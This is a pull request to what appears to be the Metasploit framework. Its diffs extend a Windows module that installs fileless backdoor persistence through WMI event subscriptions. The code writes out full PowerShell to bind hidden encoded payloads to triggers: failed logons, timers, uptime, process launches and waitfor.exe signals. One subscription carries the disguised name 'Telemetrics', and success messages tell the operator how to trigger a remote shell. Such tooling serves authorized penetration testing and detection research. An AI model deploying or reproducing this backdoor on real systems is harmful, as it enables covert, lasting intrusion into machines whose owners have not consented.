### PR TITLE
added wmi_persistence module

### DIFF
--- a/modules/exploits/windows/local/wmi_persistence.rb
+++ b/modules/exploits/windows/local/wmi_persistence.rb
@@ -19,12 +19,13 @@ class MetasploitModule < Msf::Exploit::Local
       'Name'             => 'WMI Event Subscription Persistence',
       'Description'      => %q{
           This module will create a permanent WMI event subscription to achieve file-less persistence using one
-          of two methods. The USERNAME method will create an event filter that will query the event log for an
+          of three methods. The USERNAME method will create an event filter that will query the event log for an
           EVENT_ID_TRIGGER (default: failed logon request id 4625) that also contains a specified USERNAME_TRIGGER.
           When these criteria are met a command line event consumer will trigger an encoded powershell payload.
           The INTERVAL method will create an event filter that triggers the payload after the specified CALLBACK_INTERVAL.
-          This module requires administrator level privileges as well as a high integrity process. It is also
-          recommended not to use stageles payloads due to powershell script length limitations.
+          The LOGON method will create an event filter that will trigger the payload after the system uptime has reached 
+          the specified value. This module requires administrator level privileges as well as a high integrity process.
+          It is also recommended not to use stageless payloads due to powershell script length limitations.
         },
       'Author'           => ['Nick Tyrer <@NickTyrer>'],
       'License'          => MSF_LICENSE,
@@ -46,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Local
 
     register_options([
       OptEnum.new('PERSISTENCE_METHOD',
-        [true, 'Method to trigger the payload.', 'USERNAME', ['USERNAME','INTERVAL']]),
+        [true, 'Method to trigger the payload.', 'USERNAME', ['USERNAME','INTERVAL','LOGON']]),
       OptInt.new('EVENT_ID_TRIGGER',
         [true, 'Event ID to trigger the payload. (Default: 4625)', 4625]),
       OptString.new('USERNAME_TRIGGER',
@@ -59,8 +60,47 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
 
+  def exploit
+   raise "Powershell not available" if ! have_powershell?
+
+   unless is_admin?
+      print_error("This module requires admin privs to run")
+      return
+   end
+
+   unless is_high_integrity?
+      print_error("This module requires UAC to be bypassed first")
+      return
+   end
+
+   case datastore['PERSISTENCE_METHOD']
+    when 'LOGON'
+      psh_exec(subscription_logon)
+      print_good "Backdoor installed!"
+      @cleanup
+    when 'INTERVAL'
+      psh_exec(subscription_interval)
+      print_good "Backdoor installed!"
+      @cleanup
+    when 'USERNAME'
+      psh_exec(subscription_user)
+      print_good "Backdoor installed! Call a shell using \"smbclient \\\\\\\\<target_ip>\\\\C$ -U "+datastore['USERNAME_TRIGGER']+" <arbitrary password>\""
+      @cleanup
+    end
+   end
+
+
   def build_payload
    cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)
+  end
+
+
+  def subscription_logon
+   command = build_payload
+   class_name = datastore['CLASSNAME']
+   "$filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325\"; QueryLanguage = 'WQL'}
+   $consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"}
+   $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}"
   end
 
 
@@ -69,22 +109,21 @@ class MetasploitModule < Msf::Exploit::Local
    event_id = datastore['EVENT_ID_TRIGGER']
    username = datastore['USERNAME_TRIGGER']
    class_name = datastore['CLASSNAME']
-
-"auditpol.exe /set /subcategory:Logon /failure:Enable
-$filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM __InstanceCreationEvent Within 5 WHERE TargetInstance ISA 'Win32_NTLogEvent' And Targetinstance.EventCode = '#{event_id}' And Targetinstance.Message Like '%#{username}%'\"; QueryLanguage = 'WQL'}
-$consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"}
-$FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}"
+   "auditpol.exe /set /subcategory:Logon /failure:Enable
+   $filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM __InstanceCreationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_NTLogEvent' AND Targetinstance.EventCode = '#{event_id}' And Targetinstance.Message Like '%#{username}%'\"; QueryLanguage = 'WQL'}
+   $consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"}
+   $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}"
   end
+
 
   def subscription_interval
    command = build_payload
    class_name = datastore['CLASSNAME']
    callback_interval = datastore['CALLBACK_INTERVAL']
-
-"$timer = Set-WmiInstance -Namespace root/cimv2 -Class __IntervalTimerInstruction -Arguments @{ IntervalBetweenEvents = ([UInt32] #{callback_interval}); SkipIfPassed = $false; TimerID = \"Trigger\"}
-$filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"Select * FROM __TimerEvent WHERE TimerID = 'trigger'\"; QueryLanguage = 'WQL'}
-$consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"}
-$FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}"
+   "$timer = Set-WmiInstance -Namespace root/cimv2 -Class __IntervalTimerInstruction -Arguments @{ IntervalBetweenEvents = ([UInt32] #{callback_interval}); SkipIfPassed = $false; TimerID = \"Trigger\"}
+    $filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"Select * FROM __TimerEvent WHERE TimerID = 'trigger'\"; QueryLanguage = 'WQL'}
+    $consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"}
+    $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}"
   end
 
 
@@ -124,29 +163,4 @@ $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class _
     print_status("Clean up Meterpreter RC file: #{clean_rc}")
   end
 
-
-  def exploit
-   raise "Powershell not available" if ! have_powershell?
-
-   unless is_admin?
-      print_error("This module requires admin privs to run")
-      return
-   end
-
-   unless is_high_integrity?
-      print_error("This module requires UAC to be bypassed first")
-      return
-   end
-
-   case datastore['PERSISTENCE_METHOD']
-   when 'INTERVAL'
-      psh_exec(subscription_interval)
-      print_good "Backdoor installed!"
-      @cleanup
-   when 'USERNAME'
-      psh_exec(subscription_user)
-      print_good "Backdoor installed! Call a shell using \"smbclient \\\\\\\\<target_ip>\\\\C$ -U "+datastore['USERNAME_TRIGGER']+" <arbitrary password>\""
-      @cleanup
-    end
-   end
 end

--- a/modules/exploits/windows/local/wmi_persistence.rb
+++ b/modules/exploits/windows/local/wmi_persistence.rb
@@ -19,16 +19,18 @@ class MetasploitModule < Msf::Exploit::Local
       'Name'             => 'WMI Event Subscription Persistence',
       'Description'      => %q{
           This module will create a permanent WMI event subscription to achieve file-less persistence using one
-          of four methods. The EVENT method will create an event filter that will query the event log for an EVENT_ID_TRIGGER
+          of five methods. The EVENT method will create an event filter that will query the event log for an EVENT_ID_TRIGGER
           (default: failed logon request id 4625) that also contains a specified USERNAME_TRIGGER (note: failed logon auditing
           must be enabled on the target for this method to work, this can be enabled using "auditpol.exe /set /subcategory:Logon
           /failure:Enable"). When these criteria are met a command line event consumer will trigger an encoded powershell payload.
           The INTERVAL method will create an event filter that triggers the payload after the specified CALLBACK_INTERVAL. The LOGON
           method will create an event filter that will trigger the payload after the system has an uptime of 4 minutes. The PROCESS
-          method will create an event filter that triggers the payload when the specified process is started. Additionally a custom
-          command can be specified to run once the trigger is activated using the advanced option CUSTOM_PS_COMMAND. This module requires
-          administrator level privileges as well as a high integrity process. It is also recommended not to use stageless payloads
-          due to powershell script length limitations.
+          method will create an event filter that triggers the payload when the specified process is started. The WAITFOR method
+          creates an event filter that utilises the microsoft binary waitfor.exe to wait for a signal specified by WAITFOR_TRIGGER
+          before executing the payload. The signal can be sent from a windows host on a LAN utilising the waitfor.exe command
+          (note: requires target to have port 445 open). Additionally a custom command can be specified to run once the trigger is
+          activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a
+          high integrity process. It is also recommended not to use stageless payloads due to powershell script length limitations.
         },
       'Author'           => ['Nick Tyrer <@NickTyrer>'],
       'License'          => MSF_LICENSE,
@@ -50,13 +52,15 @@ class MetasploitModule < Msf::Exploit::Local
 
     register_options([
       OptEnum.new('PERSISTENCE_METHOD',
-        [true, 'Method to trigger the payload.', 'EVENT', ['EVENT','INTERVAL','LOGON','PROCESS']]),
+        [true, 'Method to trigger the payload.', 'EVENT', ['EVENT','INTERVAL','LOGON','PROCESS', 'WAITFOR']]),
       OptInt.new('EVENT_ID_TRIGGER',
         [true, 'Event ID to trigger the payload. (Default: 4625)', 4625]),
       OptString.new('USERNAME_TRIGGER',
         [true, 'The username to trigger the payload. (Default: BOB)', 'BOB' ]),
       OptString.new('PROCESS_TRIGGER',
         [true, 'The process name to trigger the payload. (Default: CALC.EXE)', 'CALC.EXE' ]),
+      OptString.new('WAITFOR_TRIGGER',
+        [true, 'The word to trigger the payload. (Default: CALL)', 'CALL' ]),
       OptInt.new('CALLBACK_INTERVAL',
         [true, 'Time between callbacks (In milliseconds). (Default: 1800000).', 1800000 ]),
       OptString.new('CLASSNAME',
@@ -103,6 +107,11 @@ class MetasploitModule < Msf::Exploit::Local
     when 'PROCESS'
       psh_exec(subscription_process)
       print_good "Persistence installed!"
+      @cleanup
+    when 'WAITFOR'
+      psh_exec(subscription_waitfor)
+      cmd_exec("waitfor.exe #{datastore['WAITFOR_TRIGGER']}, time_out = 0")
+      print_good "Persistence installed! Call a shell using \"waitfor.exe /S <target_ip> /SI "+datastore['WAITFOR_TRIGGER']+"\""
       @cleanup
     end
    end
@@ -169,6 +178,21 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
 
+  def subscription_waitfor
+   command = build_payload
+   word = datastore['WAITFOR_TRIGGER']
+   class_name = datastore['CLASSNAME']
+   <<-HEREDOC
+    $filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM __InstanceDeletionEvent WITHIN 5 WHERE TargetInstance ISA 'Win32_Process' AND Targetinstance.Name = 'waitfor.exe'\"; QueryLanguage = 'WQL'}
+    $consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"cmd.exe /C waitfor.exe #{word} && #{command} && taskkill /F /IM cmd.exe\"}
+    $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}
+    $filter1 = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"Telemetrics\"; Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325\"; QueryLanguage = 'WQL'}
+    $consumer1 = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"Telemetrics\"; CommandLineTemplate = \"waitfor.exe #{word}\"}
+    $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter1; Consumer = $Consumer1}   
+   HEREDOC
+  end
+
+
   def log_file(log_path = nil) # Thanks Meatballs for this
     host = session.session_host
     filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
@@ -186,13 +210,24 @@ class MetasploitModule < Msf::Exploit::Local
 
 
   def cleanup
-    name_class = datastore['CLASSNAME']
-    clean_rc = log_file()
-    clean_up_rc = ""
-    clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"
-    clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"
-    clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"' DELETE\""
-    file_local_write(clean_rc, clean_up_rc)
-    print_status("Clean up Meterpreter RC file: #{clean_rc}")
+    if datastore['PERSISTENCE_METHOD'] == "WAITFOR"
+      name_class = datastore['CLASSNAME']
+      clean_rc = log_file()
+      clean_up_rc = ""
+      clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"Telemetrics\\\" DELETE\"\n"
+      clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"Telemetrics\\\" DELETE\"\n"
+      clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"Telemetrics\\\"' DELETE\""
+      file_local_write(clean_rc, clean_up_rc)
+      print_status("Clean up Meterpreter RC file: #{clean_rc}")
+    else
+      name_class = datastore['CLASSNAME']
+      clean_rc = log_file()
+      clean_up_rc = ""
+      clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"
+      clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"
+      clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"' DELETE\""
+      file_local_write(clean_rc, clean_up_rc)
+      print_status("Clean up Meterpreter RC file: #{clean_rc}")
+    end
   end
 end

--- a/modules/exploits/windows/local/wmi_persistence.rb
+++ b/modules/exploits/windows/local/wmi_persistence.rb
@@ -95,24 +95,24 @@ class MetasploitModule < Msf::Exploit::Local
     when 'LOGON'
       psh_exec(subscription_logon)
       print_good "Persistence installed!"
-      @cleanup
+      remove_persistence
     when 'INTERVAL'
       psh_exec(subscription_interval)
       print_good "Persistence installed!"
-      @cleanup
+      remove_persistence
     when 'EVENT'
       psh_exec(subscription_event)
       print_good "Persistence installed! Call a shell using \"smbclient \\\\\\\\<target_ip>\\\\C$ -U "+datastore['USERNAME_TRIGGER']+" <arbitrary password>\""
-      @cleanup
+      remove_persistence
     when 'PROCESS'
       psh_exec(subscription_process)
       print_good "Persistence installed!"
-      @cleanup
+      remove_persistence
     when 'WAITFOR'
       psh_exec(subscription_waitfor)
-      cmd_exec("waitfor.exe #{datastore['WAITFOR_TRIGGER']}, time_out = 0")
+      cmd_exec("waitfor.exe", args = " #{datastore['WAITFOR_TRIGGER']}")
       print_good "Persistence installed! Call a shell using \"waitfor.exe /S <target_ip> /SI "+datastore['WAITFOR_TRIGGER']+"\""
-      @cleanup
+      remove_persistence
     end
    end
 
@@ -193,44 +193,34 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
 
-  def log_file(log_path = nil) # Thanks Meatballs for this
+  def log_file
     host = session.session_host
     filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
-    if log_path
-      logs = ::File.join(log_path, 'logs', 'wmi_persistence',
-      Rex::FileUtils.clean_path(host + filenameinfo))
-    else
-      logs = ::File.join(Msf::Config.log_directory, 'wmi_persistence',
-      Rex::FileUtils.clean_path(host + filenameinfo))
-    end
+    logs = ::File.join(Msf::Config.log_directory, 'wmi_persistence',
+    Rex::FileUtils.clean_path(host + filenameinfo))
     ::FileUtils.mkdir_p(logs)
     logfile = ::File.join(logs, Rex::FileUtils.clean_path(host + filenameinfo) + '.rc')
-    logfile
   end
 
 
-  def cleanup
-    if datastore['PERSISTENCE_METHOD'] == "WAITFOR"
-      name_class = datastore['CLASSNAME']
-      clean_rc = log_file()
-      clean_up_rc = ""
-      clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"Telemetrics\\\" DELETE\"\n"
-      clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"Telemetrics\\\" DELETE\"\n"
-      clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"Telemetrics\\\"' DELETE\"\n"
-      clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"
-      clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"
-      clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"' DELETE\""
-      file_local_write(clean_rc, clean_up_rc)
-      print_status("Clean up Meterpreter RC file: #{clean_rc}")
-    else
-      name_class = datastore['CLASSNAME']
-      clean_rc = log_file()
-      clean_up_rc = ""
-      clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"
-      clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"
-      clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"' DELETE\""
-      file_local_write(clean_rc, clean_up_rc)
-      print_status("Clean up Meterpreter RC file: #{clean_rc}")
-    end
+  def remove_persistence
+    name_class = datastore['CLASSNAME']
+    clean_rc = log_file
+      if datastore['PERSISTENCE_METHOD'] == "WAITFOR"
+        clean_up_rc = ""
+        clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"Telemetrics\\\" DELETE\"\n"
+        clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"Telemetrics\\\" DELETE\"\n"
+        clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"Telemetrics\\\"' DELETE\"\n"
+        clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"
+        clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"
+        clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"' DELETE\""
+      else
+        clean_up_rc = ""
+        clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"
+        clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"
+        clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"' DELETE\""
+      end
+    file_local_write(clean_rc, clean_up_rc)
+    print_status("Clean up Meterpreter RC file: #{clean_rc}")
   end
 end

--- a/modules/exploits/windows/local/wmi_persistence.rb
+++ b/modules/exploits/windows/local/wmi_persistence.rb
@@ -19,14 +19,16 @@ class MetasploitModule < Msf::Exploit::Local
       'Name'             => 'WMI Event Subscription Persistence',
       'Description'      => %q{
           This module will create a permanent WMI event subscription to achieve file-less persistence using one
-          of four methods. The USERNAME method will create an event filter that will query the event log for an
-          EVENT_ID_TRIGGER (default: failed logon request id 4625) that also contains a specified USERNAME_TRIGGER.
-          When these criteria are met a command line event consumer will trigger an encoded powershell payload.
-          The INTERVAL method will create an event filter that triggers the payload after the specified CALLBACK_INTERVAL.
-          The LOGON method will create an event filter that will trigger the payload after the system has an uptime of 4
-          minutes. The PROCESS method will create an event filter that triggers the payload when the specified process is
-          started. This module requires administrator level privileges as well as a high integrity process.
-          It is also recommended not to use stageless payloads due to powershell script length limitations.
+          of four methods. The EVENT method will create an event filter that will query the event log for an EVENT_ID_TRIGGER
+          (default: failed logon request id 4625) that also contains a specified USERNAME_TRIGGER (note: failed logon auditing
+          must be enabled on the target for this method to work, this can be enabled using "auditpol.exe /set /subcategory:Logon
+          /failure:Enable"). When these criteria are met a command line event consumer will trigger an encoded powershell payload.
+          The INTERVAL method will create an event filter that triggers the payload after the specified CALLBACK_INTERVAL. The LOGON
+          method will create an event filter that will trigger the payload after the system has an uptime of 4 minutes. The PROCESS
+          method will create an event filter that triggers the payload when the specified process is started. Additionally a custom
+          command can be specified to run once the trigger is activated using the advanced option CUSTOM_PS_COMMAND. This module requires
+          administrator level privileges as well as a high integrity process. It is also recommended not to use stageless payloads
+          due to powershell script length limitations.
         },
       'Author'           => ['Nick Tyrer <@NickTyrer>'],
       'License'          => MSF_LICENSE,
@@ -48,7 +50,7 @@ class MetasploitModule < Msf::Exploit::Local
 
     register_options([
       OptEnum.new('PERSISTENCE_METHOD',
-        [true, 'Method to trigger the payload.', 'USERNAME', ['USERNAME','INTERVAL','LOGON','PROCESS']]),
+        [true, 'Method to trigger the payload.', 'EVENT', ['EVENT','INTERVAL','LOGON','PROCESS']]),
       OptInt.new('EVENT_ID_TRIGGER',
         [true, 'Event ID to trigger the payload. (Default: 4625)', 4625]),
       OptString.new('USERNAME_TRIGGER',
@@ -59,6 +61,12 @@ class MetasploitModule < Msf::Exploit::Local
         [true, 'Time between callbacks (In milliseconds). (Default: 1800000).', 1800000 ]),
       OptString.new('CLASSNAME',
         [true, 'WMI event class name. (Default: UPDATER)', 'UPDATER' ])
+    ])
+
+    register_advanced_options(
+      [
+        OptString.new('CUSTOM_PS_COMMAND',
+        [false, 'Custom powershell command to run once the trigger is activated. (Note: some commands will need to be encolsed in quotes)', false, ]),
     ])
   end
 
@@ -82,35 +90,44 @@ class MetasploitModule < Msf::Exploit::Local
    case datastore['PERSISTENCE_METHOD']
     when 'LOGON'
       psh_exec(subscription_logon)
-      print_good "Backdoor installed!"
+      print_good "Persistence installed!"
       @cleanup
     when 'INTERVAL'
       psh_exec(subscription_interval)
-      print_good "Backdoor installed!"
+      print_good "Persistence installed!"
       @cleanup
-    when 'USERNAME'
-      psh_exec(subscription_user)
-      print_good "Backdoor installed! Call a shell using \"smbclient \\\\\\\\<target_ip>\\\\C$ -U "+datastore['USERNAME_TRIGGER']+" <arbitrary password>\""
+    when 'EVENT'
+      psh_exec(subscription_event)
+      print_good "Persistence installed! Call a shell using \"smbclient \\\\\\\\<target_ip>\\\\C$ -U "+datastore['USERNAME_TRIGGER']+" <arbitrary password>\""
       @cleanup
     when 'PROCESS'
       psh_exec(subscription_process)
-      print_good "Backdoor installed!"
+      print_good "Persistence installed!"
       @cleanup
     end
    end
 
 
   def build_payload
-   cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)
+    if datastore['CUSTOM_PS_COMMAND']
+      script_in = datastore['CUSTOM_PS_COMMAND']
+      compressed_script = compress_script(script_in, eof = nil)
+      encoded_script = encode_script(compressed_script, eof = nil)
+      generate_psh_command_line(noprofile: true, windowstyle: 'hidden', encodedcommand: encoded_script)
+    else
+      cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)
+    end
   end
 
 
   def subscription_logon
    command = build_payload
    class_name = datastore['CLASSNAME']
-   "$filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325\"; QueryLanguage = 'WQL'}
+   <<-HEREDOC
+    $filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325\"; QueryLanguage = 'WQL'}
     $consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"}
-    $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}"
+    $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}
+   HEREDOC
   end
 
 
@@ -118,22 +135,25 @@ class MetasploitModule < Msf::Exploit::Local
    command = build_payload
    class_name = datastore['CLASSNAME']
    callback_interval = datastore['CALLBACK_INTERVAL']
-   "$timer = Set-WmiInstance -Namespace root/cimv2 -Class __IntervalTimerInstruction -Arguments @{ IntervalBetweenEvents = ([UInt32] #{callback_interval}); SkipIfPassed = $false; TimerID = \"Trigger\"}
+   <<-HEREDOC
+    $timer = Set-WmiInstance -Namespace root/cimv2 -Class __IntervalTimerInstruction -Arguments @{ IntervalBetweenEvents = ([UInt32] #{callback_interval}); SkipIfPassed = $false; TimerID = \"Trigger\"}
     $filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"Select * FROM __TimerEvent WHERE TimerID = 'trigger'\"; QueryLanguage = 'WQL'}
     $consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"}
-    $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}"
+    $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}
+   HEREDOC
   end
 
 
-  def subscription_user
+  def subscription_event
    command = build_payload
    event_id = datastore['EVENT_ID_TRIGGER']
    username = datastore['USERNAME_TRIGGER']
    class_name = datastore['CLASSNAME']
-   "auditpol.exe /set /subcategory:Logon /failure:Enable
+   <<-HEREDOC
     $filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM __InstanceCreationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_NTLogEvent' AND Targetinstance.EventCode = '#{event_id}' And Targetinstance.Message Like '%#{username}%'\"; QueryLanguage = 'WQL'}
     $consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"}
-    $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}"
+    $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}
+   HEREDOC
   end
 
 
